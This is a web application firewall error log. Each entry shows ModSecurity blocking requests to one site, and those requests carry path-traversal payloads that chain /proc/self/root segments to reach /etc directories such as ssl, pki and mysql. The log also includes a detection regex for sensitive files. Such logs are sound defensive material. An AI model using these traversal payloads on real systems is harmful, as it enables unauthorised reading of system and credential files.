[uri "/"] [unique_id "ablIJUTmPU-2Y17BMWW0SgAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:10.955366 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.241.46:47494] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIJpDEJR9VXonE_-1ONQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:13.494184 2026] [:error] [pid 2553:tid 140411557287680] [client 74.7.241.46:47510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIKP0Bec_B9OkZP_i8KQAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:13.494197 2026] [:error] [pid 1961:tid 140411590858496] [client 74.7.243.203:46208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIKHRXaaWotPICgYsk2QAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:25:15.302372 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.241.46:47518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIK-82sZHvlq4xgHrBqQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:17.839097 2026] [:error] [pid 1210:tid 140411590858496] [client 74.7.241.46:47528] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablILVKJy4A1bGlmj9BUzAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:19.263277 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.241.46:37506] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIL5DEJR9VXonE_-1ONwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:20.777488 2026] [:error] [pid 1210:tid 140411658000128] [client 74.7.241.46:37514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIMFKJy4A1bGlmj9BU0AAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:22.208999 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.243.203:39210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIMv0Bec_B9OkZP_i8LwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:22.261969 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.46:37516] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIMgeiSKl8TjouI-YBigAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:26.328218 2026] [:error] [pid 1961:tid 140411582465792] [client 74.7.241.46:37532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablINnRXaaWotPICgYsk3AAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:27.837102 2026] [:error] [pid 2159:tid 140411582465792] [client 74.7.241.46:37534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIN_ct6CQ8jnRyg2p7dgAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:31.499868 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.241.46:55914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIO3RXaaWotPICgYsk5AAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:32.947002 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.46:55922] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIPAeiSKl8TjouI-YBkQAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:40.082070 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.46:55936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIRAeiSKl8TjouI-YBmQAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:47.275486 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:54156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablISwQohV2v-7oj5HH6YgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:25:48.775497 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.241.46:42348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablITJqmL8PQht4WJFlG8gAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:12.352716 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.241.46:42358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIY5DEJR9VXonE_-1OXAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:13.685330 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.46:54936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIZaBJNF7axNlVR0X77wAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:15.919744 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.241.46:54942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIZ9CmCSWTlPouqorKkgAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:22.247074 2026] [:error] [pid 2553:tid 140411649607424] [client 74.7.241.46:54954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIbv0Bec_B9OkZP_i8RAAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:26:23.592722 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.241.46:46234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablIb5DEJR9VXonE_-1OZQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
